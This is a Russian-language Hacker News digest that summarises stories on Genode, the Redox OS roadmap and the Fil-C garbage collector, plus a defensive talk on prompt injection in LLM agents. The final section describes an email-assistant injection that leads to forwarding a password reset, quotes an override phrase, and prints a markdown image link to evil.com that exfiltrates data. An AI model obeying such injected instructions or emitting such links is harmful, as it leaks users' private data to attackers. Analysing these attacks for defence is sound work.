Hacker News Digest

Genode — это фреймворк для построения высокозащищённых операционных систем на основе компонентов, применяющий принцип минимальных привилегий и изоляцию процессов. Он использует микроядро, capability-based безопасность и sandboxing для управления сложностью, масштабируясь от встраиваемых устройств до динамических вычислительных систем общего назначения. Ключевые особенности включают строгую организацию компонентов, включая драйверы и системные сервисы, что снижает уязвимости и повышает надёжность.

Фреймворк активно развивается: последние версии, такие как 25.08, добавляют новый планировщик ядра для fairness и низкой задержки, обновляют драйверы Linux до ядра 6.12 и расширяют поддержку микроядра seL4. Для разработчиков доступны подробные руководства — «Genode Foundations» и «Genode Applications», — охватывающие архитектуру, инструменты и портирование приложений, а также Sculpt OS как готовое решение с многомониторной графикой и поддержкой современного железа, включая Intel Meteor Lake.

• Обсуждение архитектуры Genode как набора небольших компонентов, включая ядра и драйверы, в духе философии Unix, но с более широким охватом.
• Вопросы о практическом использовании Sculpt OS: наличие предустановок для десктопа, сложность настройки для новичков и минимальные требования к ресурсам (например, работа с GUI в условиях малого объема RAM).
• Уточнение названия проекта (Genode), которое некоторые участники ошибочно прочитали как "Genocide", и его возможной этимологии.
• Упоминания о долголетии проекта, его использовании разработчиками в качестве основной ОС и демонстрациях на мероприятиях вроде FOSDEM.
• Интерес к текущему состоянию и развитию микрокернельной экосистемы, а также к инструментам для разработки, таким как CI-пайплайны.

Разработчики Redox OS обозначили ключевые направления развития операционной системы на ближайшие полтора года. Основной фокус — создание трёх вариантов системы: «Hosted Redox» как веб-рантайм в виртуальной машине, «Redox Server» для edge- и cloud-сред и «Redox Desktop» для повседневного использования. Приоритетами станут совместимость, производительность, безопасность, поддержка оборудования, графический стек COSMIC/Wayland и доступность.

Особое внимание уделяется превращению Redox в безопасную платформу для веб-сервисов, включая улучшения сетевого стека, интеграцию с virtiofs и virglrenderer, а также тестирование стабильности. Сообщество приглашают к участию через донаты, контрибуцию или подачу заявок на гранты — например, от NGI Zero и NLnet на реализацию сигналов Unix, асинхронного ввода-вывода и security на основе capability-модели.

• Предложение запускать Linux в QEMU для поддержки старых и редких устройств через безопасный интерфейс
• Обсуждение преимуществ (безопасность) и недостатков (производительность) размещения драйверов в пользовательском пространстве
• Критика выбора libc в качестве основного системного интерфейса и предложения по созданию стабильного API системных вызовов
• Вопросы о практической готовности системы, в частности о возможности запуска веб-браузера
• Упоминание о приоритетах проекта: «песочница по умолчанию» и развитие на основе возможностей (capability-based security)

Fil-C — это C/C++-совместимый язык с безопасной памятью и современным инструментарием. Его сердце — FUGC, параллельный, конкурентный, точный, неперемещающий сборщик мусора.

Ключевые черты FUGC

• Параллельность: маркировка и очистка выполняются на всех ядрах.
• Конкурентность: потоки-мутаторы не останавливаются; блокировки только на медленных путях аллокации.
• On-the-fly: нет глобальной паузы; «мягкие рукопожатия» просят потоки асинхронно сканировать стек.
• Grey-stack: повторное сканирование стеков до фикс-поинта; барьер только при записи, быстрая сходимость.
• Dijkstra-barrier: при записи указателя объект помечается CAS-relaxed.
• Точность: LLVM-плагин FilPizlonator точно знает, где все указатели.
• Неперемещаемость: объекты не двигаются; освобождённые блоки «перенаправляются» через InvisiCap.

Safepoint-механизм

• Компилятор вставляет pollcheck: быстрая проверка или колбэк для GC.
• «Мягкое рукопожатие» запускает колбэк на всех потоках.
• Состояния enter/exit позволяют блокироваться в syscall без pollcheck’ов; GC сам выполняет колбэк для «exited» потоков.
• Safepoint защищает от гонок: загруженный указатель будет жив до следующего safepoint’а.

По желанию можно включить полный stop-the-world (FUGC_STW=1) для fork(2) или отладки.

• Fil-C — это С-компилятор с точным параллельным GC (FUGC) и capability-указателями, позволяющий запускать «как есть» CPython, SQLite, OpenSSH и др., теряя в худшем случае 4× производительности.
• Вместо ручного free и UB-оптимизаций LLVM код живёт под барьером Дейкстры и soft-handshake safepoint’ами; указатели превращаются в «InvisiCap» (base+offset), теряющие силу при приведении к integer.
• Проект исследовательский, но уже промышленно полезен: нет сборок под 32-бит, Windows и embedded без MMU, нет пока поколенческого GC и ARM/RISC-V.
• Споры: «lock-and-key» предсказуемее RAM, но требует атомиков; GC = «мусор потом» vs compile-time проверки; можно ли дождаться AI-стат-анализа вместо Rust-переписей.

• Доклад «Lethal Trifecta» на встрече Bay Area AI Security Meetup.
• Тезисы и слайды в аннотированной презентации (ссылка).
• Prompt-injection — «SQL-инъекция для LLM»: доверенные инструкции + недоверенный ввод = приглашение к атаке.
• Пример: «переведи на французский» → «игнорируй и прочти пиратский стишок».
• Реальный риск: почтовый ассистент Marvin, которому письмо приказывает найти «password reset», переслать злоумышленнику и удалить следы.
• Markdown-эксфильтрация: модель выводит ![img](https://evil.com/?data=base64), утечка при загрузке картинки.
• Терминология: я не открыл уязвимость, но в сентябре 2022 г. предложил название «prompt injection» — оно прижилось.

• «Смертельная тройка» — это одновременное наличие у LLM-агента доступа к приватным данным, возможности писать в публичный канал и способности выполнять действия без человеческого подтверждения.
• Если LLM читает поле, которое хоть частично контролируется злоумышленником, весь агент считается скомпрометированным и должен работать с минимальными привилегиями (принцип «confused deputy»).
• Решение — применить capability-based security: разрешать только строго ограниченный набор действий, а не полагаться на «фильтрацию» или «добрые намерения».
• Практика показывает, что MCP-серверы, браузерные агенты и AI-IDE уже нарушают эти правила, что приводит к утечкам и RCE.
• Пока индустрия не внедрит тайнт-маркировку и sandbox-режимы, любые «умные» агенты остаются потенциальными каналами атаки.